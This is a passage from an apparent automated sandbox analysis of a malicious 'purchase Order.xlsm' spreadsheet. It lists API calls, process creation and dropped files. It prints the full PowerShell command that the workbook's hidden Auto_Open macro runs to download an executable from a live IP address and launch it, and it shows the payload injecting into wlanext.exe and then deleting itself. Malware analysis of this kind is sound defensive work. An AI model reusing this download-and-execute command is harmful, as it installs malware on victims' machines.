            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C122AE
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00BFFA2B
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B7EBB0
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0DBD2
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C003DA
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C12B28
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0D466
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5841F
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C125DD
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B72581
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B5D5E0
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B40D20
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C11D55
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C12D07
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C12EF7
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B66E30
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C0D616
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C1DFCE
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00C11FF1
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_00401030
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_0041B8B3
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_0041C10F
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_0041C19E
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_0041C2BC
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_0041C4E6
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_00408C90
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_00408C95
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_00402D88
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_00402D90
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_0041CFFA
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_00402FB0
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A2B28
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339231B
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA309
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FAB40
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0337CB4F
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330EBB0
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FEB9A
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330138B
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0337EB8A
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03328BE8
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033823E3
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033903DA
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330ABD8
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339DBD2
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0338FA2B
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FB236
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03395A4F
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A32A9
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A22AE
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03394AEF
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339E2C5
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F4120
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032DF900
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F99BF
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033AE824
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA830
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D6800
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03391002
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033020A0
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A20A8
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032EB090
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033960F5
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A28EC
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A1FF1
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033967E2
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033ADFCE
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F6E30
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339D616
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F5600
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03381EB6
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A2EF7
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033006C0
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D0D20
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A2D07
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A1D55
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033065A0
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03302581
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03392D82
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032ED5E0
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A25DD
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032E841F
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339CC77
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FB477
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339D466
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03394496
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009B8C90
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009B8C95
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009B2D90
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009B2D88
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009B2FB0
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009CCFFA
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 03365720 appears 44 times
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 032DB150 appears 177 times
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0332D08C appears 45 times
            Source: C:\Users\Public\eVJOpc.exeCode function: String function: 0041A4B0 appears 40 times
            Source: C:\Users\Public\eVJOpc.exeCode function: String function: 00B4B150 appears 45 times
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_004185D0 NtCreateFile,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00418680 NtReadFile,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00418700 NtClose,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_004187B0 NtAllocateVirtualMemory,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_004186FA NtClose,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_004187AB NtAllocateVirtualMemory,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B898F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B899A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B895D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B896E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B897A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B898A0 NtWriteVirtualMemory,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89820 NtEnumerateKey,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B8B040 NtSuspendThread,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B899D0 NtCreateProcessEx,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89950 NtQueueApcThread,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89A80 NtOpenDirectoryObject,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89A10 NtQuerySection,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B8A3B0 NtGetContextThread,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89B00 NtSetValueKey,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B895F0 NtQueryInformationFile,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B8AD30 NtSetContextThread,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89520 NtWaitForSingleObject,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89560 NtWriteFile,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B896D0 NtCreateKey,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89610 NtEnumerateValueKey,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89670 NtQueryInformationProcess,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89650 NtQueryValueKey,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89730 NtQueryVirtualMemory,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B8A710 NtOpenProcessToken,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89770 NtSetInformationFile,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B8A770 NtOpenThread,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B89760 NtOpenProcess,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_004185D0 NtCreateFile,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_00418680 NtReadFile,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_00418700 NtClose,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_004187B0 NtAllocateVirtualMemory,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_004186FA NtClose,
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_004187AB NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033196E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033195D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0331A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033199A0 NtCreateSection,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033199D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0331B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319840 NtDelayExecution,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033198A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033198F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0331A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319710 NtQueryInformationToken,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0331A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033197A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319780 NtMapViewOfSection,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319650 NtQueryValueKey,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033196D0 NtCreateKey,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0331AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03319560 NtWriteFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033195F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009C85D0 NtCreateFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009C8680 NtReadFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009C87B0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009C8700 NtClose,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009C86FA NtClose,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009C87AB NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeProcess Stats: CPU usage > 98%
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll C5D3FB8CC4B1BE9B9AABEEB14B7F4C12F3FCE5C8DFB0C1968C82D8B5C19B9245
            Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/><workbookPr codeName="ThisWorkbook"/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Administrator\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><workbookProtection workbookAlgorithmName="SHA-512" workbookHashValue="g6J+U4jdDrb3WMKx8jWXEvB5PUnevNCnWu18PHNvGg3ndF21lKTVsvDW13wLgH7HS9vnHDRqP928qns3kCbkxA==" workbookSaltValue="p3a4TEPalWYAjtkycguiHw==" workbookSpinCount="100000" lockStructure="1"/><bookViews><workbookView xWindow="390" yWindow="390" windowWidth="21600" windowHeight="11385" firstSheet="1" activeTab="1"/></bookViews><sheets><sheet name="i0o86z" sheetId="2" state="hidden" r:id="rId1"/><sheet name="Sheet1" sheetId="1" r:id="rId2"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">i0o86z!$E$6</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
            Source: purchase Order.xlsmVirustotal: Detection: 22%
            Source: purchase Order.xlsmReversingLabs: Detection: 40%
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\explorer.exe 'C:\Windows\system32\explorer.exe' C:\Users\Public\eVJOpc.exe
            Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
            Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\eVJOpc.exe 'C:\Users\Public\eVJOpc.exe'
            Source: C:\Users\Public\eVJOpc.exeProcess created: C:\Users\Public\eVJOpc.exe 'C:\Users\Public\eVJOpc.exe'
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
            Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\eVJOpc.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\explorer.exe 'C:\Windows\system32\explorer.exe' C:\Users\Public\eVJOpc.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\eVJOpc.exe 'C:\Users\Public\eVJOpc.exe'
            Source: C:\Users\Public\eVJOpc.exeProcess created: C:\Users\Public\eVJOpc.exe 'C:\Users\Public\eVJOpc.exe'
            Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\eVJOpc.exe'
            Source: C:\Windows\SysWOW64\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{00931FDB-06EA-4BE4-B65D-68115E3B9413} - OProcSessId.datJump to behavior
            Source: qqxmvpxcvyt.dll.8.drBinary string: LanmanWorkstationLanmanServerc:\lanmanWorkgroupHOMEAdministrators\\Default-First-Site-NameNo commenthttp://https://SSL:%uhttphttps\DavWWWRoot@SSL80443AdministratorGuest_ldap._tcp.dc._msdcs.\Device\UnknownTransport_\Device\NetBT_Tcpip_LsaQueryInformationPolicy failed with NT status %x
            Source: qqxmvpxcvyt.dll.8.drBinary string: \Device\UnknownTransport_
            Source: qqxmvpxcvyt.dll.8.drBinary string: \Device\NetBT_Tcpip_
            Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@15/13@0/1
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_00402053 CoCreateInstance,MultiByteToWideChar,
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2976:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_01
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: unknownProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: purchase Order.xlsmInitial sample: OLE zip file path = xl/media/image1.png
            Source: 47E20000.0.drInitial sample: OLE zip file path = xl/media/image1.png
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
            Source: Binary string: wntdll.pdbUGP source: eVJOpc.exe, 00000008.00000003.370323842.000000000F210000.00000004.00000001.sdmp, eVJOpc.exe, 00000009.00000002.452970458.0000000000B20000.00000040.00000001.sdmp, wlanext.exe, 00000013.00000002.564446547.00000000033CF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: eVJOpc.exe, wlanext.exe
            Source: Binary string: wlanext.pdb source: eVJOpc.exe, 00000009.00000002.452915644.0000000000AD0000.00000040.00020000.sdmp
            Source: Binary string: wlanext.pdbGCTL source: eVJOpc.exe, 00000009.00000002.452915644.0000000000AD0000.00000040.00020000.sdmp
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_079427DB push ebx; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0794DE80 push es; ret
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_0041B87C push eax; ret
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_0041B812 push eax; ret
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_0041B81B push eax; ret
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_0041C9B0 push dword ptr [E4BA1D0Dh]; ret
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00418B85 pushfd ; ret
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00415F20 push ebp; iretd
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_0041B7C5 push eax; ret
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00B9D0D1 push ecx; ret
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_0041B87C push eax; ret
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_0041B812 push eax; ret
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_0041B81B push eax; ret
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_0041C9B0 push dword ptr [E4BA1D0Dh]; ret
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_00418B85 pushfd ; ret
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_00415F20 push ebp; iretd
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_1_0041B7C5 push eax; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0332D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009CB81B push eax; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009CB812 push eax; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009CB87C push eax; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009CC9B0 push dword ptr [E4BA1D0Dh]; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009C8B85 pushfd ; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009CB7C5 push eax; ret
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_009C5F20 push ebp; iretd
            Source: C:\Users\Public\eVJOpc.exeFile created: C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\eVJOpc.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\eVJOpc.exeJump to dropped file

            Boot Survival:

            barindex
            Drops PE files to the user root directoryShow sources
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\eVJOpc.exeJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
